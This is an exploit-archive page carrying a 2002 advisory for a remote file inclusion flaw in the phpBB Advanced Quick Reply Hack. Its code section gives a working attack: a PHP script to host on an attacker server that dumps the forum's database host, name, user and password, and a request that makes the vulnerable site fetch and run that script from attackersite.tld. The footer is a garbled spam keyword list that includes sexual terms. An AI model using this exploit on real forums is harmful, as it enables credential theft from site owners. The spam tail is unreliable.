about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , PHPBB Advanced Quick Reply Hack Remote File Include Vulnerability


Title PHPBB Advanced Quick Reply Hack Remote File Include Vulnerability
Published 2002-11-13-12:00AM
Updated 2002-11-13-05:52PM
Class Configuration Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  Discovery of this issue is credited to Hai Nam Luke <hainamluke@hotmail.com>.
Vulnerable  RustyDragon phpBB Advanced Quick Reply Hack 1.1 .0
phpBB Group phpBB 2.0 .0
phpBB Group phpBB 2.0.1
phpBB Group phpBB 2.0.2
phpBB Group phpBB 2.0.3
RustyDragon phpBB Advanced Quick Reply Hack 1.0 .0
phpBB Group phpBB 2.0 .0
phpBB Group phpBB 2.0.1
phpBB Group phpBB 2.0.2
phpBB Group phpBB 2.0.3
Not Vulnerable  
Code   Create the following malicious script (extension.inc) and host it on a webserver:

<?php
include('config'.'.php');
echo "DB Type: $dbms <br>";
echo "DB Host: $dbhost <br>";
echo "DB Name: $dbname <br>";
echo "DB User: $dbuser <br>";
echo "DB Pass: $dbpasswd <br>";
exit;
?>

Then submit the following request to the host running the vulnerable software:

http://www.example.com/quick_reply.php?phpbb_root_path=http://attackersite.tld/&mode=smilies
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 04:32:05 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
maxcpm.inf Poto sex.c navas modernbill wwwsexindi www.ceo100 guest book www.sedaoh /component www.029wan www.gowang serv-u+6.4 cutephp Trisha bat snekasex wsdclean.c phpbb expl mahatma ga anyone fuc hindi six Tagger LE. news for C Six.Com nayanathar www.scipha modules/Al BLOWJOBS news for c maxcpm.inf ip1798.com www.zhufu2 ip board 2 chatroom Asia gril. Jovencitas Heap pinkworid PostNuke B 200+%252Fc www.8dzw.c vijayasant www.wm21.c pc6 Qpop Crack Data ebu PHONEEROTI Praty Aiswryaray news for c